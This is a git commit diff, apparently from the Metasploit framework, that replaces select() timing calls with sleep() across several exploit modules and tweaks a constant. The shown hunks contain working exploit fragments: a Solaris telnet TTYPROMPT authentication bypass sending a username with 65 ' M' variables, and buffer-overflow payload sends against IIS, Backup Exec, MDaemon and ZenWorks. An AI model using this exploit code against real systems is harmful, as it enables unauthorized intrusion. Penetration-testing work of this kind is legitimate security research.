No more select(nil, nil, nil, X)

git-svn-id: file:///home/svn/incoming/trunk@3259 4d416f70-5f16-0410-b530-b9f4589650da
2005-12-27 04:40:06 +00:00 · 2005-12-27 04:40:06 +00:00 · 3fa5d999a2
parent c8d273cec0
commit 3fa5d999a2
8 changed files with 16 additions and 8 deletions
--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@ -75,7 +75,6 @@ ARCH_TYPES =
 		ARCH_PPC,
 		ARCH_SPARC
 	]
-ARCH_ALL   = ARCH_TYPES


 ARCH_CMD_UNIX  = 'cmd_unix'
@ -87,3 +86,5 @@ ARCH_CMD       =
 		ARCH_CMD_LINUX,
 		ARCH_CMD_BSD
 	]
+
+ARCH_ALL   = ARCH_TYPES + ARCH_CMD
--- a/modules/exploits/solaris/telnet/solaris_ttyprompt.rb
+++ b/modules/exploits/solaris/telnet/solaris_ttyprompt.rb
@ -29,6 +29,8 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
 				{
 					'Space'    => 2000,
 					'BadChars' => "",
+					'MinNops'  => 0,
+					'MaxNops'  => 0,
 				},
 			'PayloadCompat' =>
 				{
@ -51,6 +53,9 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
 	def exploit
 		connect
 		
+		banner = sock.get_once
+		
+		p banner
 		print_status("Setting TTYPROMPT...")
 		
 		req = 
@ -69,10 +74,12 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
 			"\xff\xf0"	
 		
 		sock.put(req)
+		sleep(0.25)
 		
 		print_status("Sending username with 65 environment variables...")
 		sock.put(datastore['USER'] + (" M" * 65) + "\n")
 		sock.put(payload.encoded)
+		sleep(0.25)
 		
 		handler
 		disconnect
--- a/modules/exploits/windows/backupexec/name_service.rb
+++ b/modules/exploits/windows/backupexec/name_service.rb
@ -100,7 +100,7 @@ class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
 		sock.put(payload.encoded)

 		print_status("Waiting for the payload to execute...")		
-		select(nil, nil, nil, 2)
+		sleep(2)
 		
 		handler
 		disconnect
--- a/modules/exploits/windows/brightstor/universal_agent.rb
+++ b/modules/exploits/windows/brightstor/universal_agent.rb
@ -110,7 +110,7 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
 			disconnect

 			# Give the process time to recover from each exception
-			select(nil, nil, nil, 0.1);
+			sleep(0.1);
 		}
 	
 		handler
--- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
+++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
@ -140,7 +140,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
 			end
 			
 			1.upto(8) { |i|
-				select(nil, nil, nil, 0.25)
+				sleep(0.25)
 				return if self.session_created?
 			}
 		}
@ -155,7 +155,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
 				connect
 			rescue => e
 				print_status("Connection failed (#{i.to_s}/20)...")
-				select(nil, nil, nil, 2)
+				sleep(2)
 				next
 			end
 			return sock
--- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb
+++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb
@ -67,7 +67,7 @@ class Exploits::Windows::Imap::MDaemonImapCramMD5Overflow < Msf::Exploit::Remote
 		res = sock.get_once
 		
 		print_status("Received LOGOUT reply: #{res.chomp}")
-		select(nil, nil, nil, 1)
+		sleep(1)
 		
 		handler
 		disconnect
--- a/modules/exploits/windows/isapi/fp30reg_chunked.rb
+++ b/modules/exploits/windows/isapi/fp30reg_chunked.rb
@ -83,7 +83,7 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
 				"0\r\n"
 				
 			s.put(req)	
-			select(nil, nil, nil, 1)
+			sleep(1)
 			
 			handler
 			disconnect
--- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb
+++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb
@ -73,7 +73,7 @@ class Exploits::Windows::Novell::ZenworksDesktopAgentOverflow < Msf::Exploit::Re
 		sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
 		
 		print_status("Overflow request sent, sleeping for four seconds")
-		select(nil, nil, nil, 4)
+		sleep(4)
 		
 		handler
 		disconnect